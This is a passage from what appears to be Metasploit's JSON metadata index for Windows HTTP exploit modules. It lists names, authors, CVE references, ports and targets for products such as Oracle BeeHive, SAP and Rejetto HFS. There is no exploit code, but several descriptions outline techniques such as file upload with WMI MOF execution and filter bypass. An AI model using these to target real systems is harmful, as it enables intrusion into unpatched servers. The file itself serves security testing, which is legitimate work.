"description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then uploading another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.",
"references": [
"OSVDB-92198",
"OSVDB-92200",
"PACKETSTORM-121168"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"MiniWeb build 300 on Windows (Before Vista)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb",
"is_install_path": true,
"ref_name": "windows/http/miniweb_upload_wbem",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/navicopa_get_overflow": {
"name": "NaviCOPA 2.0.1 URL Handling Buffer Overflow",
"full_name": "exploit/windows/http/navicopa_get_overflow",
"rank": 500,
"disclosure_date": "2006-09-28",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.",
"references": [
"CVE-2006-5112",
"OSVDB-29257",
"BID-20250"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"NaviCOPA 2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/navicopa_get_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/navicopa_get_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/netdecision_http_bof": {
"name": "NetDecision 4.5.1 HTTP Server Buffer Overflow",
"full_name": "exploit/windows/http/netdecision_http_bof",
"rank": 300,
"disclosure_date": "2012-02-24",
"type": "exploit",
"author": [
"Prabhu S Angadi",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in NetDecision's HTTP service\n (located in C:\\Program Files\\NetDecision\\Bin\\HttpSvr.exe). By supplying a\n long string of data to the URL, an overflow may occur if the data gets handled\n by HTTP Server's active window. In other words, in order to gain remote code\n execution, the victim is probably looking at HttpSvr's window.",
"references": [
"CVE-2012-1465",
"OSVDB-79651",
"URL-http://secunia.com/advisories/48168/",
"URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NetDecision 4.5.1 on XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/netdecision_http_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/netdecision_http_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/netgear_nms_rce": {
"name": "NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",
"full_name": "exploit/windows/http/netgear_nms_rce",
"rank": 600,
"disclosure_date": "2016-02-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file upload vulnerability that can be exploited by an\n unauthenticated remote attacker to execute code as the SYSTEM user.\n Two servlets are vulnerable, FileUploadController (located at\n /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).\n This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and\n 1.1.0.13.",
"references": [
"CVE-2016-1525",
"US-CERT-VU-777024",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt",
"URL-https://seclists.org/fulldisclosure/2016/Feb/30"
],
"platform": "Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NETGEAR ProSafe Network Management System 300 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/netgear_nms_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/netgear_nms_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/novell_imanager_upload": {
"name": "Novell iManager getMultiPartParameters Arbitrary File Upload",
"full_name": "exploit/windows/http/novell_imanager_upload",
"rank": 600,
"disclosure_date": "2010-10-01",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability which\n allows remote attackers to upload and execute arbitrary code.\n\n PortalModuleInstallManager",
"references": [
"OSVDB-68320",
"ZDI-10-190",
"URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/novell_imanager_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/novell_imanager_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/novell_mdm_lfi": {
"name": "Novell Zenworks Mobile Management MDM.php Local File Inclusion Vulnerability",
"full_name": "exploit/windows/http/novell_mdm_lfi",
"rank": 600,
"disclosure_date": "2013-03-13",
"type": "exploit",
"author": [
"steponequit",
"Andrea Micalizzi (aka rgod)"
],
"description": "This module exercises a vulnerability in Novell Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.",
"references": [
"CVE-2013-1081",
"OSVDB-91119",
"ZDI-13-087",
"URL-http://www.novell.com/support/kb/doc.php?id=7011895"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Novell Zenworks Mobile Device Management on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/novell_mdm_lfi.rb",
"is_install_path": true,
"ref_name": "windows/http/novell_mdm_lfi",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/novell_messenger_acceptlang": {
"name": "Novell Messenger Server 2.0 Accept-Language Overflow",
"full_name": "exploit/windows/http/novell_messenger_acceptlang",
"rank": 200,
"disclosure_date": "2006-04-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.",
"references": [
"CVE-2006-0992",
"OSVDB-24617",
"BID-17503"
],
"platform": "Windows",
"arch": "",
"rport": 8300,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Groupwise Messenger DClient.dll v10510.37"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/novell_messenger_acceptlang.rb",
"is_install_path": true,
"ref_name": "windows/http/novell_messenger_acceptlang",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/nowsms": {
"name": "Now SMS/MMS Gateway Buffer Overflow",
"full_name": "exploit/windows/http/nowsms",
"rank": 400,
"disclosure_date": "2008-02-19",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2008-0871",
"OSVDB-42953",
"BID-27896"
],
"platform": "Windows",
"arch": "",
"rport": 8800,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Now SMS/MMS Gateway v2007.06.27"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/nowsms.rb",
"is_install_path": true,
"ref_name": "windows/http/nowsms",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/octopusdeploy_deploy": {
"name": "Octopus Deploy Authenticated Code Execution",
"full_name": "exploit/windows/http/octopusdeploy_deploy",
"rank": 600,
"disclosure_date": "2017-05-15",
"type": "exploit",
"author": [
"James Otten <jamesotten1@gmail.com>"
],
"description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.",
"references": [
"URL-https://octopus.com"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Powershell"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb",
"is_install_path": true,
"ref_name": "windows/http/octopusdeploy_deploy",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle9i_xdb_pass": {
"name": "Oracle 9i XDB HTTP PASS Overflow (win32)",
"full_name": "exploit/windows/http/oracle9i_xdb_pass",
"rank": 500,
"disclosure_date": "2003-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.",
"references": [
"CVE-2003-0727",
"OSVDB-2449",
"BID-8375",
"URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Oracle 9.2.0.1 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle9i_xdb_pass.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle9i_xdb_pass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_beehive_evaluation": {
"name": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability",
"full_name": "exploit/windows/http/oracle_beehive_evaluation",
"rank": 600,
"disclosure_date": "2010-06-09",
"type": "exploit",
"author": [
"1c239c43f521145fa8385d64a9c32243",
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.",
"references": [
"CVE-2010-4417",
"ZDI-11-020",
"URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html"
],
"platform": "Windows",
"arch": "",
"rport": 7777,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Beehive 2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_beehive_evaluation.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_beehive_evaluation",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_beehive_prepareaudiotoplay": {
"name": "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
"full_name": "exploit/windows/http/oracle_beehive_prepareaudiotoplay",
"rank": 600,
"disclosure_date": "2015-11-10",
"type": "exploit",
"author": [
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM. Authentication is not\n required to exploit this vulnerability.",
"references": [
"ZDI-15-550",
"URL-http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
],
"platform": "Windows",
"arch": "",
"rport": 7777,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Beehive 2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_beehive_prepareaudiotoplay",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_btm_writetofile": {
"name": "Oracle Business Transaction Management FlashTunnelService Remote Code Execution",
"full_name": "exploit/windows/http/oracle_btm_writetofile",
"rank": 600,
"disclosure_date": "2012-08-07",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the FlashTunnelService SOAP web service on Oracle\n Business Transaction Management 12.1.0.7 to upload arbitrary files, without\n authentication, using the WriteToFile method. The same method contains a directory\n traversal vulnerability, which allows uploading the files to arbitrary locations.\n\n In order to execute remote code two techniques are provided. If the Oracle app has\n been deployed in the same WebLogic Samples Domain a JSP can be uploaded to the web\n root. If a new Domain has been used to deploy the Oracle application, the Windows\n Management Instrumentation service can be used to execute arbitrary code.\n\n Both techniques have been successfully tested on default installs of Oracle BTM\n 12.1.0.7, Weblogic 12.1.1 and Windows 2003 SP2. Default path traversal depths are\n provided, but the user can configure the traversal depth using the DEPTH option.",
"references": [
"OSVDB-85087",
"BID-54839",
"EDB-20318"
],
"platform": "Java,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle BTM 12.1.0.7 / Weblogic 12.1.1 with Samples Domain / Java",
"Oracle BTM 12.1.0.7 / Windows 2003 SP2 through WMI"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/oracle_btm_writetofile.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_btm_writetofile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_endeca_exec": {
"name": "Oracle Endeca Server Remote Command Execution",
"full_name": "exploit/windows/http/oracle_endeca_exec",
"rank": 600,
"disclosure_date": "2013-07-16",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability on the Oracle Endeca\n Server 7.4.0. The vulnerability exists on the createDataStore method from the\n controlSoapBinding web service. The vulnerable method only exists on the 7.4.0\n branch and isn't available on the 7.5.5.1 branch. In addition, the injection\n has been found to be Windows specific. This module has been tested successfully\n on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).",
"references": [
"CVE-2013-3763",
"BID-61217",
"OSVDB-95269",
"ZDI-13-190",
"URL-http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html"
],
"platform": "Windows",
"arch": "x64, x86",
"rport": 7770,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_endeca_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_endeca_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/oracle_event_processing_upload": {
"name": "Oracle Event Processing FileUploadServlet Arbitrary File Upload",
"full_name": "exploit/windows/http/oracle_event_processing_upload",
"rank": 600,
"disclosure_date": "2014-04-21",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in Oracle Event Processing\n 11.1.1.7.0. The FileUploadServlet component, which requires no authentication, can be\n abused to upload a malicious file onto an arbitrary location due to a directory traversal\n flaw, and compromise the server. By default Oracle Event Processing uses a Jetty\n Application Server without JSP support, which limits the attack to WbemExec. The current\n WbemExec technique only requires arbitrary write to the file system, but at the moment the\n module only supports Windows 2003 SP2 or older.",
"references": [
"CVE-2014-2424",
"ZDI-14-106",
"BID-66871",
"URL-http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html"
],
"platform": "Windows",
"arch": "x86",
"rport": 9002,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Oracle Event Processing 11.1.1.7.0 / Windows 2003 SP2 through WMI"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/oracle_event_processing_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/oracle_event_processing_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/osb_uname_jlist": {
"name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",
"full_name": "exploit/windows/http/osb_uname_jlist",
"rank": 600,
"disclosure_date": "2010-07-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability\n in login.php. In conjunction with the authentication bypass issue,\n the 'jlist' parameter in property_box.php can be used to execute\n arbitrary system commands.\n This module was tested against Oracle Secure Backup version 10.3.0.1.0",
"references": [
"CVE-2010-0904",
"OSVDB-66338",
"ZDI-10-118"
],
"platform": "Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/osb_uname_jlist.rb",
"is_install_path": true,
"ref_name": "windows/http/osb_uname_jlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/peercast_url": {
"name": "PeerCast URL Handling Buffer Overflow",
"full_name": "exploit/windows/http/peercast_url",
"rank": 200,
"disclosure_date": "2006-03-08",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.",
"references": [
"CVE-2006-1148",
"OSVDB-23777",
"BID-17040"
],
"platform": "Windows",
"arch": "",
"rport": 7144,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 English SP0-SP4",
"Windows 2003 English SP0-SP1",
"Windows XP English SP0/SP1",
"Windows XP English SP0/SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/peercast_url.rb",
"is_install_path": true,
"ref_name": "windows/http/peercast_url",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/php_apache_request_headers_bof": {
"name": "PHP apache_request_headers Function Buffer Overflow",
"full_name": "exploit/windows/http/php_apache_request_headers_bof",
"rank": 300,
"disclosure_date": "2012-05-08",
"type": "exploit",
"author": [
"Vincent Danen",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in the CGI version of PHP\n 5.4.x before 5.4.3. The vulnerability is due to the insecure handling of the\n HTTP headers.\n\n This module has been tested against the thread safe version of PHP 5.4.2,\n from \"windows.php.net\", running with Apache 2.2.22 from \"apachelounge.com\".",
"references": [
"CVE-2012-2329",
"OSVDB-82215",
"BID-53455",
"URL-http://www.php.net/archive/2012.php#id2012-05-08-1",
"URL-http://www.php.net/ChangeLog-5.php#5.4.3",
"URL-https://bugzilla.redhat.com/show_bug.cgi?id=820000"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 / Windows 2003 Server SP2 (No DEP) / PHP 5.4.2 Thread safe"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/php_apache_request_headers_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/php_apache_request_headers_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/privatewire_gateway": {
"name": "Private Wire Gateway Buffer Overflow",
"full_name": "exploit/windows/http/privatewire_gateway",
"rank": 200,
"disclosure_date": "2006-06-26",
"type": "exploit",
"author": [
"Michael Thumann <mthumann@ernw.de>"
],
"description": "This exploits a buffer overflow in the ADMCREG.EXE used\n in the PrivateWire Online Registration Facility.",
"references": [
"CVE-2006-3252",
"OSVDB-26861",
"BID-18647"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 English SP0",
"Windows 2000 English SP1",
"Windows 2000 English SP2",
"Windows 2000 English SP3",
"Windows 2000 English SP4",
"Windows 2003 English SP0/SP1",
"Debugging"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/privatewire_gateway.rb",
"is_install_path": true,
"ref_name": "windows/http/privatewire_gateway",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/psoproxy91_overflow": {
"name": "PSO Proxy v0.91 Stack Buffer Overflow",
"full_name": "exploit/windows/http/psoproxy91_overflow",
"rank": 200,
"disclosure_date": "2004-02-20",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow in the PSO Proxy v0.91 web server.\n If a client sends an excessively long string the stack is overwritten.",
"references": [
"CVE-2004-0313",
"OSVDB-4028",
"EDB-156",
"BID-9706"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Pro SP0-4 English",
"Windows 2000 Pro SP0-4 French",
"Windows 2000 Pro SP0-4 Italian",
"Windows XP Pro SP0/1 English",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/psoproxy91_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/psoproxy91_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/rabidhamster_r4_log": {
"name": "RabidHamster R4 Log Entry sprintf() Buffer Overflow",
"full_name": "exploit/windows/http/rabidhamster_r4_log",
"rank": 300,
"disclosure_date": "2012-02-09",
"type": "exploit",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n By supplying a malformed HTTP request, it is possible to trigger a stack-based\n buffer overflow when generating a log, which may result in arbitrary code\n execution under the context of the user.",
"references": [
"OSVDB-79007",
"URL-http://aluigi.altervista.org/adv/r4_1-adv.txt",
"URL-http://secunia.com/advisories/47901/"
],
"platform": "Windows",
"arch": "",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"R4 v1.25"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb",
"is_install_path": true,
"ref_name": "windows/http/rabidhamster_r4_log",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/rejetto_hfs_exec": {
"name": "Rejetto HttpFileServer Remote Command Execution",
"full_name": "exploit/windows/http/rejetto_hfs_exec",
"rank": 600,
"disclosure_date": "2014-09-11",
"type": "exploit",
"author": [
"Daniele Linguaglossa <danielelinguaglossa@gmail.com>",
"Muhamad Fadzil Ramli <mind1355@gmail.com>"
],
"description": "Rejetto HttpFileServer (HFS) is vulnerable to a remote command execution attack due to a\n poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by\n using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b\n over Windows XP SP3, Windows 7 SP1 and Windows 8.",
"references": [
"CVE-2014-6287",
"OSVDB-111386",
"URL-https://seclists.org/bugtraq/2014/Sep/85",
"URL-http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/rejetto_hfs_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/rejetto_hfs_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sambar6_search_results": {
"name": "Sambar 6 Search Results Buffer Overflow",
"full_name": "exploit/windows/http/sambar6_search_results",
"rank": 300,
"disclosure_date": "2003-06-21",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Andrew Griffiths <andrewg@felinemenace.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a buffer overflow found in the\n /search/results.stm application that comes with Sambar 6.\n This code is a direct port of Andrew Griffiths's SMUDGE\n exploit, the only changes made were to the nops and payload.\n This exploit causes the service to die, whether you provided\n the correct target or not.",
"references": [
"CVE-2004-2086",
"OSVDB-5786",
"BID-9607"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000",
"Windows XP"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/sambar6_search_results.rb",
"is_install_path": true,
"ref_name": "windows/http/sambar6_search_results",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sap_configservlet_exec_noauth": {
"name": "SAP ConfigServlet Remote Code Execution",
"full_name": "exploit/windows/http/sap_configservlet_exec_noauth",
"rank": 500,
"disclosure_date": "2012-11-01",
"type": "exploit",
"author": [
"Dmitry Chastuhin",
"Andras Kabai"
],
"description": "This module allows remote code execution via operating system commands through the\n SAP ConfigServlet without any authentication. This module has been tested successfully\n with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.",
"references": [
"OSVDB-92704",
"EDB-24996",
"URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf"
],
"platform": "Windows",
"arch": "",
"rport": 50000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows generic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb",
"is_install_path": true,
"ref_name": "windows/http/sap_configservlet_exec_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sap_host_control_cmd_exec": {
"name": "SAP NetWeaver HostControl Command Injection",
"full_name": "exploit/windows/http/sap_host_control_cmd_exec",
"rank": 200,
"disclosure_date": "2012-08-14",
"type": "exploit",
"author": [
"Michael Jordon",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in the SAPHostControl\n Service, by sending a specially crafted SOAP request to the management console.\n\n In order to deal with the spaces and length limitations, a WebDAV service is\n created to run an arbitrary payload when accessed as a UNC path. Because of this,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n It is enabled and automatically started by default on Windows XP SP3, but disabled\n by default on Windows 2003 SP2.",
"references": [
"OSVDB-84821",
"URL-http://www.contextis.com/research/blog/sap4/",
"URL-https://websmp130.sap-ag.de/sap/support/notes/1341333"
],
"platform": "Windows",
"arch": "",
"rport": 1128,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sap_host_control_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/sap_host_control_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sapdb_webtools": {
"name": "SAP DB 7.4 WebTools Buffer Overflow",
"full_name": "exploit/windows/http/sapdb_webtools",
"rank": 500,
"disclosure_date": "2007-07-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n By sending an overly long GET request, it may be possible for\n an attacker to execute arbitrary code.",
"references": [
"CVE-2007-3614",
"OSVDB-37838",
"BID-24773"
],
"platform": "Windows",
"arch": "",
"rport": 9999,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
